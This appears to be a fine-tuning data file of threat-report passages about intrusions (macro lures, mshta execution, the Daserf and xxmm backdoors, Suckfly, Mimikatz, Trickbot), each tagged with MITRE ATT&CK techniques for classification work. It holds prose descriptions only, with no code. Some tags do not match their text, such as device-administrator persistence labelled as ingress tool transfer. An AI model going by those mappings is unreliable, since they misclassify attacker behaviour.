10351) Hunting for PDF files that are created with the same “DocumentID” management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized['T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link']fine_tune
1036The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe['T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1204.002 - User Execution: Malicious File']fine_tune
1037The two dropped artifacts – a payload DLL and a Word document – are written to the “Users\<Log on User>\” folder (the document will replace the opened malicious document with clean stub after killing the running Word process['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
1038Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity['T1573.001 - Symmetric Cryptography']fine_tune
10391) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee’s system, they gained access to the e-commerce company's internal network. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it’s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure['T1046 - Network Service Discovery']fine_tune
1040Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat['T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1134.004 - Access Token Manipulation: Parent PID Spoofing']fine_tune
1041The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
1043In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory['T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
1044MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking “uninstall” in settings['T1105 - Ingress Tool Transfer']fine_tune
1045A screen capture of Trickbot’s code that is structured to steal passwords from popular web browsers . It should be noted that this Trickbot variant is not capable of stealing passwords from third-party password manager applications. Screen capture of code showing possible SMB communication . networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users. It's also used to inject code into its target processes using the Reflective DLL Injection technique. James’s Place Bank, and Royal Bank of Scotland, and will redirect users to fake phishing websites. Trickbot’s other notable tricks . Trickbot is usually sent via malicious spam campaigns. Defending against Trickbot’s tricks: Trend Micro solutions . Malware authors continue to update banking trojans like Trickbot and Emotet with new modules that make it more difficult to detect and combat['T1185 - Browser Session Hijacking']fine_tune